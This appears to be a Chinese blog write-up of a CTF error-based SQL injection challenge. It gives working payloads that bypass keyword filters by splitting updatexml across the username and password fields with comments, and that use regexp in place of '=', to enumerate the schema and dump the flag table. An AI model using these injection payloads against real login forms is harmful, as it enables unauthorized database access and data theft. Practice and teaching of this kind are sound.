CTF实验吧- 加了料的报错注入分值

本文深入探讨了使用BurpSuite进行SQL注入攻击的实战技巧,包括如何绕过常见过滤,利用不同函数进行信息泄露,以及从数据库中提取敏感数据的具体方法。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

 

用burpsuit对username进行fuzz一下,发现过滤了超多东西,

被过滤就会显示 user name unknow error 或者Sql injection detected 或者Unknown password error.

没有过滤只会显示 Login failed

# limit strsub union () ,

没有过滤

extractvalue,updatexml

 

再来看看看password

() or xor没有被过滤掉

 updatexml extractvalue则被过滤掉了

提示是这样写的:

$sql="select * from users where username='$username' and password='$password'

尝试构造$sql="select * from users where username=1'updatexml/* and password=*/(1,database(),1)and1='1

playload:

username=1'and updatexml/*&password=*/(1,concat(0x24,(select database()),0x24),1)and '1

爆表:

username=1'or updatexml/*&password=1*/(1,concat(0x24,(select table_name from information_schema_tables where table_schema = 'error_based_hpf',0x24),1)and '1&login=login

发现 =  被过滤了

代替 = 有很多种方法 

like

regexp

username=1'or updatexml/*&password=1*/(1,concat(0x24,(select group_concat(table_name) from information_schema.tables where table_schema regexp database()),0x24),1)and '1&login=login

username=1'or updatexml/*&password=1*/(1,concat(0x24,(select group_concat(column_name) from information_schema.columns where table_name regexp 'ffll44jj'),0x24),1)or '1&login=login

 

 dump数据

username=1'or updatexml/*&password=1*/(1,concat(0x24,(select group_concat(value) from ffll44jj),0x24),1)or '1&login=login

评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值